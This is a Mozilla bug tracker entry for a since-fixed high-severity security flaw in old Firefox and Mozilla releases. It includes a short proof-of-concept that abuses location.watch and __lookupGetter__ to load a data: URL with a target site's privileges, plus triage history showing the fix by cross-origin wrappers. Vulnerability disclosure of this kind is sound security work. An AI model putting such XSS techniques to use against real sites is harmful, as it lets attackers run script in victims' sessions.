Closed
Bug 361961
Opened 18 years ago
Closed 17 years ago
XSS by using location.watch("href") and Object.prototype.__lookupGetter__ or __lookupSetter__
Categories
(Core :: DOM: Core & HTML, defect)
RESOLVED
FIXED
mozilla1.9alpha8
People
(Reporter: moz_bug_r_a4, Assigned: mrbkap)
Details
(Whiteboard: [sg:high] fixed by XOW)
This XSS attack only works against certain sites that are using scripts that try to change a parent window's location.href.

An attacker can run script with a target site's principal by using location.watch("href", ...) and an Object.prototype.__lookup(G|S)etter__ method that came from an xbl compilation scope or a target site's global scope.

  <marquee id="m">
  func = m.init.__lookupGetter__;

or

  <iframe src="target site">
  func = frames[0].location.__lookupGetter__;

  location.watch("href", func);
  location.__lookupGetter__("href").toString = function() {
    return "data:text/html,<script> ... </script>";
  };

1. A target site's script executes |top.location.href = foo|.
2. __lookupGetter__("href", undefined, foo) is called on the location object in the top window, and it returns the location.href getter function.
3. The href getter function's toString() method is called and returns a data: url.
4. The data: url is loaded with the target site's principal.

This affects the trunk, fx2.0.0.1, fx1.5.0.9, fx1.0.8 and moz1.7.13.
Comment 3•18 years ago
The "watch" part reminds me of bug 354978, but that one is fixed now and doesn't do anything to stop these testcases.
Assignee: dveditz → mrbkap
Whiteboard: [sg:high]
Updated•17 years ago
Flags: blocking1.9+
Comment 4•17 years ago
Targeting to B1 per conversation with Blake.
Target Milestone: --- → mozilla1.9beta1
Comment 5•17 years ago
Fixed by cross origin wrappers.
Updated•17 years ago
Flags: in-testsuite?
Updated•17 years ago
Flags: wanted1.8.1.x+
Flags: blocking1.8.1.7?
Whiteboard: [sg:high] → [sg:high] fixed by XOW
Updated•17 years ago
Flags: blocking1.8.1.8? → blocking1.8.1.9?
Updated•17 years ago
Flags: blocking1.8.1.12? → blocking1.8.1.13?
Updated•16 years ago
Flags: blocking1.8.1.13?
Updated•12 years ago
Group: core-security
Updated•5 years ago
Component: DOM → DOM: Core & HTML